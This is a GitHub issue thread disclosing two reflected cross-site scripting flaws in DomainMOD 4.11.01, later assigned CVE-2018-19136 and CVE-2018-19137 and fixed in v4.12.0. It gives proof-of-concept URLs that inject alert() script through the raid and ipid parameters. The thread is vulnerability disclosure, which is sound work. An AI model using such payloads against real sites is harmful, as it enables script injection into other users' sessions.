Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross Site Scripting Vulnerability in DomainMOD 4.11.01 #79

Closed
Dawood9920 opened this issue Nov 9, 2018 · 4 comments
Closed

Cross Site Scripting Vulnerability in DomainMOD 4.11.01 #79

Dawood9920 opened this issue Nov 9, 2018 · 4 comments
Assignees

Comments

@Dawood9920
Copy link

Multiple XSS vulnerability was discovered in domainmod v4.11.01
There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML.

1.http://127.0.0.1/domainmod/assets/edit/registrar-account.php?raid=%22%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E&del=1
2.http://127.0.0.1/domainmod/assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&del=1

@Dawood9920
Copy link
Author

CVE ID assigned for the above two vulnerabilities reported:

  1. XSS in raid parameter : CVE-2018-19136
  2. XSS in ipid parameter : CVE-2018-19137

@xrand3r
Copy link

xrand3r commented Nov 19, 2018

i have found a vulnerability too. what is the procedure to responsibly disclose.

@chetcuti
Copy link
Member

chetcuti commented Feb 3, 2019

@xrand3r, feel free to submit a new GitHub issue or send me an email at support@domainmod.org to report the vulnerability.

@chetcuti
Copy link
Member

chetcuti commented Feb 3, 2019

These issues were fixed in v4.12.0, which was released today.

Thanks for the reports!

@chetcuti chetcuti closed this as completed Feb 3, 2019
@chetcuti chetcuti self-assigned this Feb 3, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants